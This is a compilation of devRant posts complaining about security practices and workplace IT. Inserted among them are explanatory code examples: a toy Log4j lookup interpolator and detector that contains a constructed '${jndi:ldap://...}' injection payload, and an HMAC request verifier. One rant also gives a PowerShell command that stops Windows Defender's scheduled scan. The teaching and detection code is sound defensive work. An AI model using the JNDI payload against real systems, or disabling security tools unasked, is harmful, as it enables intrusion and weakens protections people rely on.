- Open to ideas but when I bring them up such as - This is what most standards suggest, here's a literal example of exactly what you want but easier - He will passively decide against it and end up working on tedious things not very necessary for project release dates.
- On another project I try to write code but he wants to go over every single nook and cranny and stay on the phone the entire day as I watch his screen and I'm trying to code.
I would like us all to do well but I do not consider him a programmer but a script-whippersnapper. I find myself trying to debate the most basic of things (you shouldn't 777 every file), and I need all kinds of evidence before he will do something about it. We need "security" and all kinds of buzz words but I'm scared to death of this code. After several months it's a nice place to work but I am convinced I'm being pranked or my boss has very little idea what he's doing. I've worked in a lot of disasters but nothing like this.
We are building an API, I could use something open source to help with anything from validations, routing, ACL but he ends up reinventing the wheel. I have never worked so slow, hindered and baffled at how I am supposed to build anything - nothing is stable, tested, and rarely logical. I suggested many things but he would rather have small talk and reason his way into using things he made.
I could have this project 50% done in a Node API in two weeks, pretty fast in a PHP or Python one, but for reasons I have no idea about we would rather go slow and literally "build a framework". Two knuckleheads are going to build a PHP REST framework and compete with tested, tried and true open source tools used by tens of millions?
I just wanted to rant because this drives me crazy. I have so much stress my neck and shoulder seem like a nerve is pinched. I don't understand what any of this means. I've never met someone who was wrong about so many things but believed they were right. I just don't know what to say, so often on a call I just say, 'uhh..'. It's like nothing anyone or any authority says matters. I don't know why he asks anything; he's going to do things one way, a hard way, only that he can decipher. He's an owner, he's not worried about job security.
-
If there are bugs in your code, the problem 100% of the time is that you’re not using Rust. Just rewrite it in Rust, and all bugs, security, and performance issues will disappear. Any software not currently written in Rust should be rewritten in Rust. Rust is all you need to know as a Software Engineer. The future is Rust. Welcome to Software3.
-
There you are, fiddling with next.js webpack settings, because your isomorphic JS-in-CSS-in-JS SSR fallback from react-native-web to react-dom throws a runtime error on your SSR prerendering server during isomorphic asynchronous data prefetching from Kubernetes backend-for-frontend edge-server with GraphQL.
You have all that tech to display a landing page with an email form, just to send spam emails with ten tracking links and five tracking beacons per email.
Your product can be replaced by an Excel document made in two days.
It was developed in two years by a team of ten developers crunching every day under twelve project managers that can be replaced with a parrot trained to say “Any updates?”
Your evaluation is $5M+. You have 10,000 dependency security warnings, 1000 likes on Product Hunt, 500 comments on Hacker News, and a popular Twitter account.
Your future looks bright. You finish your coffee, crack your knuckles and carry on writing unit tests.
-
just saw a tweet praising a company because of their choice to use swiss servers and they had a pompous sentence in parenthesis like (upside to banking secret culture)
like, dude, at the end of the day, guaranteed their 'server' is just a linux box somewhere, just like anywhere else in the world just STFU
god i HATE ignorance, hype, and stupid tropes that managers just automatically subscribe to with their 2 brain cell NPC brain
-
Why the fuck do people not change their router admin password!? I was at a hotel today and could access their router admin interface with the default credentials. I guess this isn't purely the fault of the hotel because not all people know a damn thing about security and only use the interface to change the SSID and password of the AP. But why allow them to leave the default password? Why isn't this a standard feature to be forced to change the password :|
-
PyTorch.
2018: uh, what happens when someone uses a same name attack? - No big deal. https://github.com/pypa/pip/...
2020: I think that's a security issue. - Nanana, it's not. https://github.com/pypa/pip/...
2022: malicious package extracts sensitive user data on nightly. https://bleepingcomputer.com/news/...
You had years to react, you clowns.
-
Apple: this AppleID has been locked for security reasons.
User: Sign Out
Apple: Enter the Apple ID password to turn off Find My iPhone.
User: Turn Off
Apple: You must enter both your Apple ID and password.
User: OK
Apple, please stop bugging me, all I need is to test my websites on Safari occasionally because some customers prefer to use iPhone. Just don't bother me with your Apple ID crap
-
Security!
Offensive and defensive at both code and infrastructure levels.
So many times I see devs not give a flying pancake about security. Whether it be rolling integers for sql injection or permission guarding to prevent someone executing something they shouldn't.
Why is security in this industry always the last thing to be concerned about when it's the first thing that's going to kill your business.
😓
-
Installed SonarQube and Snyk on the CI/CD of a 2.5 year old project that only had a linter enabled previously.
Practically zero problems found. One minor problem (same code in different branches), a few false positives, and a few possible problems in dependencies that I have no control over.
Now wondering:
Am I really that good or are those tools just shit?
-
Registering a new account for microsoft teams:
`Your password cannot contain a space, &# characters combination, or the following characters: < >`
Are they storing the passwords in plain text? Are they not sanitizing the input? Why the fuck would they care if I put motherfucking emojis in my password? What the fuck are you doing to the passwords, Microsoft? TELL ME.
-
Wtf? What kind of user agent header is that? Why don't you go ahead and insert my fucking social security number in there, Android? According to amiunique, this is literally a unique header ON ITS OWN.
-
So it turns out that one of our systems is so fucking old that its Log4j is off the hook. What they say of blessings being disguised as curses is real.
-
Love how DoD work requires Sec+ certification but as you are learning the material you realize they don’t follow any procedures or practices.
-
I wrote an auth today.
Without frameworks. Without dependencies. Without under-the-hood magic. Without abstract pluggable adaptor modules for the third-party auth library with 63 vulnerabilities and 1252 GitHub issues. Without security vulnerabilities showing up in NPM log. Without dependency of a dependency of a dependency using md5 and Math.random() under the hood for historical reasons, and now we're fucked, because this is the only lib for our framework, and we have no time to write our own replacement. Without all that shit.
Rock-solid, on top of scrypt. Stateless and efficient.
It felt amazing.
-
The most annoying hack I've had to deal with was back when I did IT support, actually. Level 1 call center tech at the time. Apparently someone fell for a phishing email and gave out his outlook credentials. The phisher used that email account to send out another phishing email to roughly 1800 employees.
Security Operations noticed, because this guy's job didn't generally involve sending out mass-communication emails. They investigated, figured out what had happened, and opted for the nuclear option: they reset the password for EVERY SINGLE ACCOUNT that received the email. All 1800 of them. Over the weekend.
I walked into the call center Monday morning and checked the call stats, then did a double-take. There were over 300 people waiting in the queue. I almost left and called in sick. Turns out it wasn't that bad though. Annoying to reset so many passwords and having no downtime due to the full queue, but on the other hand my stats were better that day than any other, since every call was a 5-minute password reset.
-
Our school had for an open source way of dealing with home schooling and managing the school network and so on.
Now the government forced a "proprietary" system on our school and everyone hates it. The teachers didn't want it, the pupils didn't want it, but who cares, "what we do is the best".
Btw the proprietary system costs a fuck load of money even though they just mixed many open source projects and made it their own proprietary thing.
And this company now gets loads of money for their shitty system that never really worked once since we got it.
They blocked so many IPs that we can't even access Google and its services on the school wifi and the bandwidth dropped severely with the new system.
Oh and many random IPs, e.g. one of my VPS is accessible but the other one not.
Discord is blocked.
Web whatsapp.
And so on...
Now....
I need to learn for tests next week and need to access that stuff on the portal but...
Now they decided to switch the LDAP server to the new system and for a few hours I haven't been able to access this fucking thing.
It seems like the platform now contacts the new server which isn't even up and running....
Never change a fucking running system....
Oh and we got smart boards and they run on Android and they didn't block adb. Now I installed Clash of Clans on one of those things. Haha whoops.
These boards cost 7000€ and have security patches from 2 years ago....and Android 8
-
Hey, we need a service to resize some images. Oh, it’ll also need a globally diverse cache, with cache purging capabilities, only cache certain images in the United States, support auto scaling, handle half a petabyte of data , but we don’t know when it’ll be needed, so just plan on all of it being needed at once. It has to support a robust security profile using only basic HTTP auth, be written in Java, hosted on-prem, and be fully protected from ddos attacks. It must be backwards compatible with the previous API we use, but that’s poorly documented, you’ll figure it out. Also, it must support being rolled out 20% of the way so we can test it, and forget about it, and leave two copies of our app in production.
You can re-use the code we already have for image thumbnails even though it’s written in Python, caches nothing and is hosted in the cloud. It should be easy. This guy can show you how it all works.
-
Imagine: It's the year 4249.
Corporate has finally managed to convince workers that they don't need a salary.
Workers are now paid with food, shelter and clothes. And it's only in effect if you achieve your deadlines.
Keystroke monitoring softwares are now replaced with Webcam eye tracking software.
GitHub Co-Pilot now takes over your code editor and tries to dictate you how to write better code.
Refusing to do results in a signal sent to the management about your behaviour and you lose food access for the day.
HR Recruiters now require you to give them a blood sample and part of your house as a security deposit.
They also require you to have a micro-chip placed in your brain so they can monitor their worker's thought process.
Switching a job is no longer an option. You pledge allegiance to one company your entire career.
You can never see the real world now because the government has mandated you to never take off your VR glasses.
You see the world the way the government wants you to see it.
PHP is still trash.
Life is Good.
-
Security in defense is a joke.
New hire does not have accts set up told him over and over!
He decides to go into a classified area and just try. Common last name with first initial.
Guess what he was able to get in because no one changed the default password!
Yep now someone with an interim clearance got access to a machine that goes from unclass to secret and then top secret!
-
Other team lead: Hi DevOps Team, We need you to deploy this app to production. It's maintainers gave up on it in 2019, but we looked at it and it feels right.
Me: Uhm. That's not going to work. It'll fail the security scan before you can even finish the build in CI.
Other team lead: Yeah, this app is the right thing to do, and we needed it last week, but since that won't work, we'll just use this other very very infant technology that was just born yesterday. It's not stable in production, or on MySQL, or in AWS at all, but it's the other direction we can to go.
Me: What problem are you trying to solve in the first place?
Other team lead: Oh, we need access to read from the production database.
-
I hate Wednesdays. Networking has the Antimalware service run a full/deep scan every Wednesday and my machine is basically unusable until it finishes.
Devs: "Can we have the scheduled task not run during the day, maybe even on the weekend?"
Gary: "Security is our #1 priority and without proper security methods in place, we'll be open to outside threats. Security begins with you, and ..blah blah blah"
Bite me Gary. I got something for ya.
Get-ScheduledTask | ? TaskName -eq 'Windows Defender Scheduled Scan' | Stop-ScheduledTask
-
Waiting for the floors I just mopped to dry, and I'm still thinking about migrating and if, for example, the swiss give me a good job offer, I would most likely stick around. I don't hate to stick around Europe, but it defo doesn't have any of the elements I like. (megacity, snows, English speaking, multicultural, non-torturous migration laws)
Like, I'm at that point where I'm not making enough money and want to leave (also, gaining the freedom to leave from degree soon enough) but I absolutely hate my home place (personal reasons) but they pay a crapton better, plus I can get social security benefits.
... And I want to do a phd. 😐
Someone beat some sense into me please.
-
Apparently Patreon has fired (and then outsourced) the entire cyber security team. What's the worst that could happen?
https://thehackernews.com/2022/09/...
-
One of our customers wants our mobile app to log out the user after 15 minutes of inactivity because of SeCuRiTy…
Why? The phones protect the apps with their hardware encryption from any malicious access.
And we are not dealing with super sensitive data here like some banking app or so.
Why do some people want to have bad UX for no reason?
-
!rant
Sometimes I think about packing up my bags and just going into security consulting just to get away from the world of being an infrastructure anarchist for software companies that are overvalued "Export to Excel" generators.
-
I f&#king hate it here. I am just eyeing to exit as soon as 1 year of my contractual obligation is over. My employer is a good employer. Provides good benefits but I just can't take the bureaucrazy in here. Just yesterday, had to ask another team to deploy objects on our behalf as they are the schema owner. They did it and asked us to review it today. But how? We don't even have manual access to the schema, because we are not the content owner and security! But that's fine, I can always query the catalog views and check the metadata and should be able to conclude the deployment. Right? NOOOO. Because security! Of what? Column names?
Prev rant: https://devrant.com/rants/5145722/...
-
If it ain't broke, don't fix it!
I feared my Android phone's touchscreen suffered severe damage from using it in the rain, until I discovered that the 3-button navigation stopped working after an Android 12 security update (both in Nova launcher as well as in official Google Pixel launcher). Wasted time drying the unplugged phone and googling for repair options before finally wasting more time changing system settings back and forth, rebooting, changing system settings, rebooting, etc.
Remember those happy times before mobile phones had been invented, which of course I don't really want back either. I just want developers to stop breaking features that used to work. Regression testing outside the happy path, anyone? I mean, it's not a hacked maker project, it's a commercial phone that I bought and intend to use with the latest official software. Don't want to think about the next breaking changes that Android 13 might bring.
-
I have to add an endpoint to integrate an API and I want to vomit when I think about this major security issue they introduce.
What type of prehistoric dumbass thought GET requests with username and password in the query parameters is a good idea to burden your partner with.
-
Does someone know a site where I can get professional level help/guides/tutorials with system architecture questions? Like best practices for implementing common features? (Something like Stack Overflow but where you actually get an answer instead of insults)
Googling for tutorials gives very basic/demo level results that might not be great for scale/security in a prod env
-
At the beginning of the last year of university a new flatmate arrived. His father dropped him at the apartment and then called me asking for the Wi-Fi password.
I told him I could not remember it on the spot and I would tell it to his son later.
I actually remembered it very well and I could say I didn’t tell him because of security reasons …
Actually I was embarrassed to say on phone: “PubesRule!”
The password was actually decided by a previous flatmate…😅
-
This was initially a reply to a rant about politics ruining the industry. Most of it is subjective, but this is how I see the situation.
It's not gonna ruin the industry. It's gonna corrupt it completely and fatally, and it will continue developing as a toxic sticky goo of selfishness and a mandatory lack of security until it chokes itself.
Because if something can get corrupted, it will get corrupted. The only way for us as a species to make IT into a worthy industry is to screw it up countless times over the course of a hundred years until it's as stable and reliable as it can possibly be and there are as many paradigms and individually reasonable standards as there can possibly be.
Look around, see the ridiculous amount of stupid javascript frameworks, most of which is just shitcode upon vulnerabilities upon untested dependencies. Does this look to you like an uncorrupted industry?
The entire tech is rotting from the hundreds of thousands of lines of proprietary firmware and drivers through the overgrown startup scene to fucking Node.js, and how technologies created just a few decades ago are unacceptable from a security standpoint. Check your drivers and firmware if you can, I bet you can't even see the build dates of most firmware you run. You can't even know if it was built after any vulnerability regarding that specific microcontroller or whatever.
Would something like this work in chemical engineering? Hell no! This is how fucking garage meth labs work, not factories or research labs. You don't fucking sell people things without mandatory independent testing. That's how a proper industry works. Not today's IT.
Of course it's gonna go down in flames. Greed had corrupted the industry, and there's nothing to be done about it now but working as much as we can, because the faster we move the sooner we'll get stuck and the sooner we can start over on a more reasonable foundation.
Or rely on layers of abstraction and expect our code to be compilable on anything the future holds for us.
-
New job. Almost all sites are blocked due to "security"... even Spotify. I can't listen to the music. Fortunately I have access to devRant xd
-
CORS is shit
Stupid useless shit that protects from nothing. It is a harmful mechanism that does nothing but randomly block the browser from accessing resources - nothing more.
The main idea of CORS is that if the server does not send the proper header in response to an OPTIONS request, the browser will block other requests to that server.
What do the stupid cocksuckers that invented CORS think their retarded shit can protect from?
- If the server is malicious, it will send any header required to let you access it.
- If the client has malicious intent, he will never use your shit browser to make requests; he will use curl or any other tool available. Also, if server security is based on something as unreliable as the HTTP headers it sends to the client, it's a shit server, and CORS will not save it.
Can anyone give REAL examples when CORS can really protect from anything?
-
Salesforce lightning web components have such bullshit limitations that they claim is because of security but it's just because it's overengineered garbage.
Want to use web components? Nope.
Want to pass in a value to a function in a click listener expression? Nope.
Want to use scss? Nope, compile it to css yourself.
Want to use the fucking document object? Guess what it's overridden except for very specific third party frameworks.
Who in the fuck thought it was a good idea to override the document object? Your app isn't more secure, literally the entire internet uses the document object and it still becomes available in runtime anyway so what the fuck??
LWC is the biggest garbage I've ever seen, you know a framework's a big red flag when there are developers solely for the framework.
There is a new security release coming out that apparently removes some of these nuances (understatement) so there might be some light at the end of the tunnel.
-
I fucking hate Google, but made the decision to use it as my primary search engine once again.
Reality dictates that I have already adopted it for well over a decade via searches since AllTheWeb existed along with owning enough Android devices to choke a twelve headed dragon whore.
But, here's the main reason: You.com and DuckDuckGo are so dumb as fuck, they might as well be Ron Jeremy's MySpace page.
You.com, for instance, is "completely customizable" by adding un-customizable "apps" without any control over the content it spews into your SERPS.
Neither seems to have interest in no longer padding results with shit you'd take a knife to. At least Google allows me to block those pages or sites from being seen again.
If you happen to live on Planet Earth (which currently seems to exclude 86.8% of the human population) you've been tracked before you even knew what "Big Brother" meant.
If you're looking to safeguard your security, buy a goddamn sword and time travel to remove the Zuckerberg timeline from existence.
-
Back in https://devrant.com/rants/5492690 @Nihil75 referred to SlickVPN with a link, where you can buy a lifetime licence for $20. I thought - what the hell.. I don't need a public VPN rn, but for $20 for a lifetime lic - I'll take it, in case I'll ever need one.
I had some trouble signing up - the confirmation email never reached my inbox. So I got in touch with support. And they.... generated and sent me a password in plain text.
And there even isn't any nagging requirement to change the pass after I sign in for the first time!
IDK... As for a service claiming to be security-oriented, the first interaction already screams "INSECURE".
Well.. should still be OK for IP switching, to unlock Netflix content I guess. Don't need anything secure for that 🤷16 -
My org (of which I'm basically CTO) has this administrative tool that a team uses to combat spam and scams, which is quite the problem for us.. the tool was written like 9 years ago, by my predecessor, very quick & dirty and unaesthetic and without input from those who would use it as far as interface or UX... it got modded a little a few years later by a kind of amateur coder who was at the time on the spam control team, and now there's this new maybe slightly less amateur coder guy on the team who has written this amateur tool that scrapes data off our site and massages it and stores it on his own server and then provides a better interface, or so they say.... this is all because for a couple of years people didn't want to "bother me" with a request to improve our internal tool, they thought I was "too busy" doing other things... so instead this outsider has built this stupid thing that lives on his own personal server and so now we have these problems to do with performance, security, privacy for user info, etc etc... someone please shoot me....1
-
Dependency hell is the largest problem in Linux.
On Windows, I just download an executable (.exe) file, and it just works like a charm! But Linux sometimes needs me to install dependencies.
At one point, I nearly broke my operating system while trying to solve dependencies. I noticed that some existing applications refused to start due to some GLIBC error gore. I thought to myself "that thing ain't gonna boot the next time", so I had to restore the /usr/lib/x86_64-linux-gnu/ folder from a backup.
And then there is a new level of lunacy called "conflicting dependencies". I never had such an error on Windows. But when I wanted to try out both vsftpd and proFTPd on Linux, I get this error, whereas on Windows, I simply download an .exe file and it WORKS! Even on Android OS, I simply install an APK file of Amaze File Manager or Primitive FTPd or both and it WORKS! Both in under a minute. But on Linux, I get this crap. Sure, Linux has many benefits, but if one can't simply install a program without encountering cryptic errors that take half a day to troubleshoot and could cause new whack-a-mole-style errors, Linux's poor market share is no surprise.
Someone asked "Why not create portable applications" on Unix/Linux StackExchange. Portable applications cannot just be copied on flash drives and to other computers, but allow easily installing multiple versions on a system. A web developer might do so to test compatibility with older browsers. Here is an answer to that question:
> The major argument [for shared libraries] is security, that if there is a vulnerability in a commonly-used library, then only that library has to be updated […] you don't have to have 4 different versions of a library installed
I just want my software to work! Period. I don't mind having multiple versions of libraries, I simply want it to WORK! To hell with "good reasons" for why it doesn't, and then being surprised why Linux has a poor market share. Want to boost Linux market share? SOLVE THIS DAMN ISSUE!
Understand that the average computer user wants stuff to work out of the box, like it does in Windows.58 -
I dont understand the Log4j vulnerability.
Isn't the ability to execute code a feature they added so that you can add dynamic data to the logs?
If it is a feature then isn't it written in the documentation?
Is the problem that a lot of companies forgot to sanitize the input before logging it?23 -
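The mechanism the question above is asking about, as an added example that is not from the poster and is not Log4j's own code: a toy log formatter with string lookups (`${date:...}`, `${env:...}`, `${jndi:...}`). The pre-fix behaviour expands lookups over the *whole* rendered line, so lookups embedded in logged, attacker-supplied text (here a constructed User-Agent header) are resolved too; the fixed variant expands lookups only in the operator-written layout. The same inside-out expansion doubles as a detector that normalises obfuscated forms such as `${${lower:j}ndi:...}` instead of grepping for the literal `jndi`. The `jndi` lookup here only records the URL it would have fetched; the environment and date values are hypothetical.

```python
import re

# Innermost "${...}" with no nested braces; expanded repeatedly, inside-out,
# the way a lookup interpolator resolves nested lookups.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# Constructed environment for the "env" lookup (hypothetical values).
FAKE_ENV = {"HOME": "/home/app"}


class LookupRecorder:
    """Resolves lookups and collects every JNDI target that was requested.

    Instead of opening a network connection we only record the URL, which is
    enough to show *whether* untrusted text reached the lookup."""

    def __init__(self):
        self.jndi_targets = []

    def resolve(self, body):
        # "${name:-default}" falls back to default when name cannot be resolved
        if ":-" in body:
            name, default = body.split(":-", 1)
        else:
            name, default = body, None
        key, _, arg = name.partition(":")
        key = key.lower()                      # lookup prefixes are case-insensitive
        if key == "jndi":
            self.jndi_targets.append(arg)
            return "<object fetched from %s>" % arg
        if key == "lower":
            return arg.lower()
        if key == "upper":
            return arg.upper()
        if key == "date":
            return "2021-12-10"                # fixed value for a deterministic example
        if key == "env" and arg in FAKE_ENV:
            return FAKE_ENV[arg]
        if default is not None:
            return default
        # Unknown lookup: keep it literally, but hide the braces from the next
        # round so the expansion terminates.
        return "\x00" + body + "\x01"


def expand_lookups(text, recorder, max_rounds=20):
    """Resolve ${...} lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        expanded = INNER_LOOKUP.sub(lambda m: recorder.resolve(m.group(1)), text)
        if expanded == text:
            break
        text = expanded
    return text.replace("\x00", "${").replace("\x01", "}")


LAYOUT = "${date:ISO} ${env:HOME} msg=%m"   # operator-controlled pattern layout


def format_vulnerable(message, recorder):
    """Pre-fix behaviour: the message is spliced into the layout first and
    lookups are then expanded over the whole line, so lookups written by
    whoever controlled the logged string get resolved too."""
    return expand_lookups(LAYOUT.replace("%m", message), recorder)


def format_fixed(message, recorder):
    """Lookups are only expanded in the layout the operator wrote; the logged
    message is inserted verbatim afterwards."""
    return expand_lookups(LAYOUT, recorder).replace("%m", message)


def jndi_targets(text):
    """Detection helper: run the same inside-out expansion on a suspicious
    string and report which JNDI URLs it would have reached."""
    rec = LookupRecorder()
    expand_lookups(text, rec)
    return rec.jndi_targets


if __name__ == "__main__":
    # Constructed request header an attacker might send, as it would be logged.
    ua = "User-Agent: ${jndi:ldap://203.0.113.5:1389/a}"
    rec = LookupRecorder()
    print(format_vulnerable(ua, rec), rec.jndi_targets)
    rec = LookupRecorder()
    print(format_fixed(ua, rec), rec.jndi_targets)
    print(jndi_targets("${${lower:j}${upper:n}di:ldap://203.0.113.5/a}"))
```

The answer to "sanitize the input" is visible in the two formatters: the problem is not that the logged string was unsanitised, it is that the formatter treated the logged string as a template. A sanitiser that strips `${jndi:` would miss the nested `${${lower:j}ndi:...}` form, which is why the detector above runs the expansion instead of matching a substring.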
I don't care about market cap. Stick your hype-driven business practices up your ass. Infinite growth doesn't exist. I won't read your fucking books and attend your fucking bootcamps and MBAs. You don't have a business model. Selling data is not a business model. Fuck your quick-flip venture capital schemes, and especially fuck your “ethics”.
I will be the first alt-tech CEO. I only care about revenue. The real money, not capitalization bubble vaporware. You don't need a huge fleet of engineers if you're smart about your technology, know how to do architecture, and you're not a feature creep. You don't need venture capital if you don't need a huge fleet of engineers. You don't need to sell data if you don't need venture capital. See? See the pattern here?
My experience allows me to build products on entirely my own. I am fully aware of the limitations of being alone, and they only inspire lean thinking and great architectural decisions. If you know throwing capacity at a problem is not an option, you start thinking differently. And if you don't need to hire anyone, it is very easy to turn a profit and make it sustainable.
If you don't follow the path of tech vaporware, you won't have the problems of tech vaporware, namely distrust of your user base, shitty updates that break everything, and of course “oops, they raised capital, time to leave before things go south”.
A friend of mine went the path I'm talking about, developed a product over the course of four years all alone, reached $10k MRR and sold for $0.8M. But I won't sell. I only care about revenue. If I get to $10k MRR, I will most likely stop doing new features and focus on fixing all the bugs there are and improving performance. This and security patches. Maybe an occasional facelift. That's it. Some products are valued because they don't change, like Sublime Text. The utility tool you can rely on. This is my scheme, this is what I want to do in life. A best-kept secret.
Imagine 100 million users that hate my product but use it because there are no alternatives, 100 people in data enrichment department alone, a billion dollars of evaluation (without being profitable), 10 million twitter followers, and ten VC firms telling me what to do and what data to sell.
Fuck that. I'd rather have one thousand loyal customers and $10k MRR. I'm different, some call it a mental illness, but the bottom line is, my goals are beyond their understanding. They call me crazy. I won't say it was never about the money, of course it was, but inflating your evaluation is not “money”. But the only thing they have is their terrible hustle culture lives and some VC street wisdom, meanwhile I HAVE products, it is on record on my PH. I have POTDs, I have a fucking Golden Kitty nomination on health and fitness for a product I made in one day. Fuck you.6 -
Laziest habit? Anything done between 1pm-4:30pm and 4:59pm-8pm. During that time, habits include unnecessary refactoring, poking the CI/CD containers, editing already made prototypes in gimp inkscape, pasting stackoverflow topics to youtube, bouncing from macOS, windows and kde distros in search of zen/rice, adding a calendar emoji on my slack :), making useless automation scripts, building on every variable's value change, tinkering pixels, shades, gradients (and their angles), dimens, anim values, anim curves, opacity, blurs and just nuking the ui just to copy paste an old one, 60% just chatting in code alongs, changing key bindings (from ide to OS), and ultimately zoning out on a podcast about cyber security. And of course: waiting for ++ and comments
-
Yesterday, the Project Manager forwarded an email from a staff member who worked on a donations campaign. Staff member was confused about a Cloudflare challenge that appeared before the user was sent to the donation page. It’s a less than 5 second JavaScript check. He thought it looked fishy.
I had to explain that it’s a security measure that’s been up for almost a month. PM knows this but left it to me to explain because ownership of the site is on me. The donations page and api gets hit by a lot of bots because it’s a public api and there are no security measures like captchas to deter the bots. I’m inheriting this website and I didn’t build it.
Staff member says other staff want to know if the Cloudflare page can be customized so it looks more legit. Um, Cloudflare is a widely known legit service. Google it.
A few thoughts pop into my head:
1. Engineering communicated to stakeholders about the Cloudflare messaging a month ago.
2. Wow, stakeholders don’t share relevant info with their staff who aren’t on these emails.
3. Woooow, stakeholders and staff don’t look at the website that often.2 -
A customer specialising in identification and security solutions called today, claiming "they" found malware on their website. Then they provided a weird link to some shady malware scanner, and the "malware" turned to be a <noscript> tag which adds ?noscript to the page url, so we can serve no-JS optimised content. As a bonus, the scanner only detected it on two URLs, even though every single page on the site contains that same line of code.
Joke's on them, have fun paying for priority support outside of the business hours for nothing.2 -
IT admins of devRant, explain the following to my dumb ass:
Why would an IT department put servers in a VPN without TLS?
They presume they don't need it because muh-VPN.
And then they don't want to hand out VPN connections to anyone and force me to use Citrix RDP 🤡
I know there are security reasons, but is there not a better way? Like goteleport.com ?
Asking for a friend (or several)5 -
I'm trying to reach Alice but none of my messages get through. Maybe Eve has something to do with it 🤔5
-
Project with partner company, during the meeting I asked them how we could secure the communication between the two services. I suggested API keys, tokens. They were like nope, no need. But I asked them for their IPs to do whitelisting on our side in Nginx.
But on their side, nah, not even whitelisting, no tokens, no validations. If one has the address, one can send anything from anywhere.
How hard would it be to do at least, AT LEAST simple token validation. And they are using a very old IIS server. I think for them as long as data flows in as expected, it is fine.3 -
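What "at least simple token validation" plus IP whitelisting looks like in code, as an added example that is not the poster's and not from either company's stack: the sending service signs each request with an HMAC over method, path, timestamp and body hash; the receiving service checks the source network, the freshness window, the signature (constant-time) and a replay cache, in that order. The secret, the partner network range and the sample request are hypothetical and constructed for the example.

```python
import hashlib
import hmac
import ipaddress

# Assumptions for this example: the secret is generated once and provisioned
# to both services out of band; the partner's egress range is known.
SHARED_SECRET = b"0123456789abcdef0123456789abcdef"              # hypothetical; use 32 random bytes
PARTNER_NETWORKS = [ipaddress.ip_network("198.51.100.0/24")]  # constructed allowlist
MAX_CLOCK_SKEW = 300                                           # seconds


def canonical_request(method, path, timestamp, body):
    """Everything the signature must cover: verb, path, time, and a hash of
    the body. Hashing the body keeps the MAC input small and still binds
    every byte of it."""
    body_digest = hashlib.sha256(body).hexdigest()
    return "\n".join([method.upper(), path, str(timestamp), body_digest]).encode()


def sign(secret, method, path, timestamp, body):
    """Sender side: the value that goes into the X-Signature header."""
    return hmac.new(secret, canonical_request(method, path, timestamp, body),
                    hashlib.sha256).hexdigest()


class RequestVerifier:
    """Receiver side: network allowlist, freshness window, HMAC check, replay cache."""

    def __init__(self, secret, networks, max_skew=MAX_CLOCK_SKEW):
        self.secret = secret
        self.networks = networks
        self.max_skew = max_skew
        self.seen = set()   # (timestamp, signature) pairs accepted inside the window

    def verify(self, client_ip, method, path, headers, body, now):
        """Return (accepted, reason). Cheapest checks run first, and the replay
        cache is only updated after the signature has been validated."""
        ip = ipaddress.ip_address(client_ip)
        if not any(ip in net for net in self.networks):
            return False, "ip not allowlisted"
        try:
            ts = int(headers.get("X-Timestamp", ""))
        except ValueError:
            return False, "bad timestamp"
        if abs(now - ts) > self.max_skew:
            return False, "timestamp outside window"
        presented = headers.get("X-Signature", "")
        expected = sign(self.secret, method, path, ts, body)
        if not hmac.compare_digest(expected, presented):   # constant-time compare
            return False, "bad signature"
        if (ts, presented) in self.seen:
            return False, "replay"
        self.seen.add((ts, presented))
        # Drop entries that could no longer pass the freshness check anyway.
        self.seen = {e for e in self.seen if abs(now - e[0]) <= self.max_skew}
        return True, "ok"


if __name__ == "__main__":
    body = b'{"order": 42}'          # constructed request body
    ts = 1_700_000_000
    headers = {"X-Timestamp": str(ts),
               "X-Signature": sign(SHARED_SECRET, "POST", "/api/orders", ts, body)}
    v = RequestVerifier(SHARED_SECRET, PARTNER_NETWORKS)
    print(v.verify("198.51.100.7", "POST", "/api/orders", headers, body, ts + 2))
    print(v.verify("198.51.100.7", "POST", "/api/orders", headers, body, ts + 3))  # replay
```

The IP allowlist is the same control as the Nginx whitelist, kept here so the example runs stand-alone; in production it belongs at the proxy and the application keeps only the signature and replay checks. Note that without the signature the allowlist alone is exactly the situation the post describes: anyone who can reach the address from an allowed network can send anything.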
A new update was just released to AltRant!
This update features:
- Massive UI responsiveness fixes and enhancements, including many fixes for UI bugs, fixes and things that needed tweaking
- A COMPLETE overhaul of all devRant API methods (a switch to my new library, SwiftRant)
- Progress with Android compatibility (replaced incompatible libraries for compliance with Mutata)
- Enhanced security with the Keychain
Here’s the link to join again:
https://testflight.apple.com/join/...7 -
I was on Instagram and I saw a boy advertising to sell 5k followers and I was wondering, how do they do that? Can they programmatically create and control those accounts? I know they can use the Instagram API to some degree but I feel like Instagram probably has security set up to detect that type of stuff (5k accounts following someone at the same time, etc). Does anybody know? I'm actually really curious7
-
Jesus christ I need my VP and CIO to get their hands out of Azure and GCP and just let me work.
Yes, governance and security and IAM are big deals. That's why you have infraops people like me to deal with that.
I'm literally working with one hand tied behind my back because just about every button press or CLI command I need to do my damn job as a professional cloud fluffer requires me to go bother an executive and ask permission to pretty please can I deploy a new container, can you go press the shiny button? No not that one, move your mouse up...up..now UP..ok over lef-no..can I have mouse control? Sigh fine, do you see where it says "Approvers", no that says "Release Pipeline"
Look I actually kinda like this job, I do, in as much as when I have something to do I get left the fuck alone to do it. Meetings are minimal, aside from the odd days when one of our app services decides to yeet itself into the river Styx, there's little distractions.
Yeah, developers do dumb shit but that's probably best left to the notion of job security and never talked about again lest they go to HR and complain that the ops guy was very stern and direct and made the developer take some accountability for their work product.
AND YET
It's so intergalactically stupid that I have to go ask permission just to do ops tasks by the same people barging down my goddamn door asking why the ops task isn't done yet.
"Because you won't give me permissions in GCP to actually DO anything".
Okay. Rant over. Time for lunch. Good meeting, see you all at the holiday party.2 -
Real conversation with my shit bank
Me: Hey, I want to change the phone number associated with my card because I no longer have access to it. (aka stolen). I can't find the option to do so on your website anymore.
Them: Yeah, for security reasons you now have to come down to the bank (which involves standing in line for anywhere between 40 minutes and 2 hours) to do that simple change.
The actual fuck.12 -
Any of us have had annoyances with people with "a million dollar app idea", but what about those who give unsolicited career advice?
I'm dealing with a boomer who keeps trying to get me to change my career and work in cyber security (because TV told him it's a well paid field) despite me kindly telling him multiple times that it's not going to happen, because I won't throw away a career I love to work in a field which seems deadly boring to me (I love everything about coding, from design to typing for hours on Vim, meanwhile the mere thought of reading obscure documentation for hours to find potential vulnerabilities in a system kills my spirit).9
Play Store's $25 registration fee - for getting a PWA listed in their shitty catalogue? Who in their right mind would even jump into this clusterfuck of a store to find a *web* app? For all you know, Google, there is such a thing as QR codes - and customers can just scan the code (or type in that sweet address). Voila! Boom!!! Ching-ching!
